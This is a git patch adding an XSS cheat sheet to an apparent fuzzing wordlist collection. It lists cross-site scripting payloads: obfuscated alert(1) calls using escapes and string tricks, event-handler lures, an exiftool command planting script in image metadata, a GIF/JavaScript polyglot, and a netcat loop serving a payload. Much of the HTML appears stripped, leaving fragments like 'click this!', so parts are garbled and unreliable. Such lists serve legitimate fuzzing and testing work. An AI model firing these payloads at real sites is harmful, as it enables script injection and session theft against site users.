From 601038eb4ea18c97177b43a757286d3c8a815db8 Mon Sep 17 00:00:00 2001 From: Daniel Miessler Date: Wed, 13 Jul 2016 12:58:49 -0700 Subject: [PATCH] Added @Brutelogic's brilliant XSS Cheatsheet. --- Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt | 141 ++++++++++++++++++++++++++ 1 file changed, 141 insertions(+) create mode 100644 Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt diff --git a/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt b/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt new file mode 100644 index 00000000000..b691ce97214 --- /dev/null +++ b/Fuzzing/BRUTELOGIC_XSS_CHEATSHEET.txt @@ -0,0 +1,141 @@ + +"> +http://DOMAIN/PAGE.php/"> + + + + +(alert)(1) +a=alert,a(1) +[1].find(alert) +top["al"+"ert"](1) +top[/al/.source+/ert/.source](1) +al\u0065rt(1) +top['al\145rt'](1) +top['al\x65rt'](1) +top[8680439..toString(30)](1) +lose focus! +click this! +copy this! +right click this! +copy this! +double click this! +drag this! +focus this! +input here! +press any key! +press any key! +press any key! +click this! +hover this! +hover this! +hover this! +click this! +paste here! + +click +click +
+ + + + + + +
+
.gif +$ exiftool -Artist='">' FILENAME.jpeg + +GIF89a/**/=alert(document.domain)//; + +#alert(1) +#alert(1) +# + +$ while:; do echo "alert(1)" | nc -lp80; done +